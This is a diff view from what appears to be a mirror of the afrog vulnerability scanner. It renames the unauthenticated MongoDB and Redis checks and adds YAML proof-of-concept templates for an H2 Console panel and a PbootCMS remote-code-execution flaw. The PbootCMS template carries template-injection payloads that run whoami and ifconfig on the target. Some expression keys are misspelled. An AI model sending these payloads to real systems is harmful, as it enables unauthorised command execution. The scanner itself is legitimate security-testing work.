STRLCPY/afrog

Revision indexing in progress... (symbol navigation in revisions will be accurate after indexed)

■ ■ ■ ■ ■ ■

pkg/gopoc/mongodb.go

		skipped 9 lines
10	10		"github.com/zan8in/afrog/pkg/proto"
11	11		)
12	12
13		-	var mongodbUnAuthName = "mongodb-unauth"
	13	+	var (
	14	+	mongodbPort = "27017"
	15	+	mongodbUnAuthName = "mongodb-unauth"
	16	+	)
14	17
15		-	func mongodbAuth(args *GoPocArgs) (Result, error) {
	18	+	func mongodbUnAuth(args *GoPocArgs) (Result, error) {
16	19		poc := poc.Poc{
17	20		Id: mongodbUnAuthName,
18	21		Info: poc.Info{
		skipped 28 lines
47	50		}
48	51		}
49	52
50		-	addr := args.Host + ":27017"
	53	+	addr := args.Host + ":" + mongodbPort
51	54		err := mongodbPayload(addr, senddata, getlogdata)
52	55		if err == nil {
53	56		result.IsVul = true
54		-	url := proto.UrlType{Host: args.Host, Port: "27017"}
	57	+	url := proto.UrlType{Host: args.Host, Port: mongodbPort}
55	58		result.SetAllPocResult(true, &url, []byte(addr), []byte("MongoDB 未授权访问"))
56	59		return result, nil
57	60		}
		skipped 35 lines
93	96		}
94	97
95	98		func init() {
96		-	GoPocRegister(mongodbUnAuthName, mongodbAuth)
	99	+	GoPocRegister(mongodbUnAuthName, mongodbUnAuth)
97	100		}
98	101

■ ■ ■ ■ ■ ■

pkg/gopoc/redis.go

		skipped 8 lines
9	9		"github.com/zan8in/afrog/pkg/utils"
10	10		)
11	11
12		-	var redisAuthName = "redis-unauth"
	12	+	var (
	13	+	redisPort = "6379"
	14	+	redisUnAuthName = "redis-unauth"
	15	+	)
13	16
14		-	func redisAuth(args *GoPocArgs) (Result, error) {
15		-	// init pocinfo & result
	17	+	func redisUnAuth(args *GoPocArgs) (Result, error) {
16	18		poc := poc.Poc{
17		-	Id: redisAuthName,
	19	+	Id: redisUnAuthName,
18	20		Info: poc.Info{
19	21		Name: "Redis 未授权访问",
20	22		Author: "zan8in",
		skipped 28 lines
49	51		}
50	52		}
51	53
52		-	addr := args.Host + ":6379"
	54	+	addr := args.Host + ":" + redisPort
53	55		payload := []byte("*1\r\n$4\r\ninfo\r\n")
54	56
55	57		resp, err := utils.Tcp(addr, payload)
		skipped 3 lines
59	61
60	62		if bytes.Contains(resp, []byte("redis_version")) {
61	63		result.IsVul = true
62		-	url := proto.UrlType{Host: args.Host, Port: "6379"}
	64	+	url := proto.UrlType{Host: args.Host, Port: redisPort}
63	65		result.SetAllPocResult(true, &url, payload, resp)
64	66		return result, nil
65	67		}
		skipped 2 lines
68	70		}
69	71
70	72		func init() {
71		-	GoPocRegister(redisAuthName, redisAuth)
	73	+	GoPocRegister(redisUnAuthName, redisUnAuth)
72	74		}
73	75

■ ■ ■ ■ ■ ■

pocs/deleted/h2-console-panel.yaml

1	+	id: h2-console-panel
2	+
3	+	info:
4	+	name: H2 Console Panel
5	+	author: 执着
6	+	severity: critical
7	+	description: \|
8	+	H2 Console未授权访问，可执行任意系统命令
9	+	影响版本3.0.1以前"
10	+	reference:
11	+	- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23221
12	+	- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42392
13	+
14	+
15	+	rules:
16	+	r0:
17	+	request:
18	+	method: GET
19	+	path: /login.jsp
20	+	exppression: response.status == 200
21	+	exppression: r0()

■ ■ ■ ■ ■ ■

pocs/deleted/pbootcms-rce.yaml

1	+	id: pbootcms-rce
2	+
3	+	info:
4	+	name: Pboot CMS RCE
5	+	author: 执着
6	+	severity: critical
7	+	description: \|
8	+	PbootCMS前台RCE，执行任意系统命令
9	+	影响版本3.0.1以前"
10	+
11	+	set:
12	+	reverse: newReverse()
13	+	reverseURL: reverse.url
14	+	referer: request.url
15	+	host: request.url.host
16	+	rules:
17	+	r0:
18	+	request:
19	+	method: GET
20	+	path: /#}{pboot:if(true)(@sys.@tem)(@whoami);//)}test{/pboot:if}
21	+	headers:
22	+	Referer: '{{referer}}'
23	+	Domain: '{{host}}'
24	+	Reverse: '{{reverseURL}}'
25	+	Content-Length: 100
26	+	Host: 127.0.0.1
27	+	exppression: response.status == 200 && response.body.bcontains(b'flags=')
28	+	r1:
29	+	request:
30	+	method: GET
31	+	path: /#}{pboot:if(true)(@sys.@tem)(@ifconfig);//)}test{/pboot:if}
32	+	expresssion: response.status == 200 && response.body.bcontains(b'Windows')
33	+	expression: r0() \|\| r1()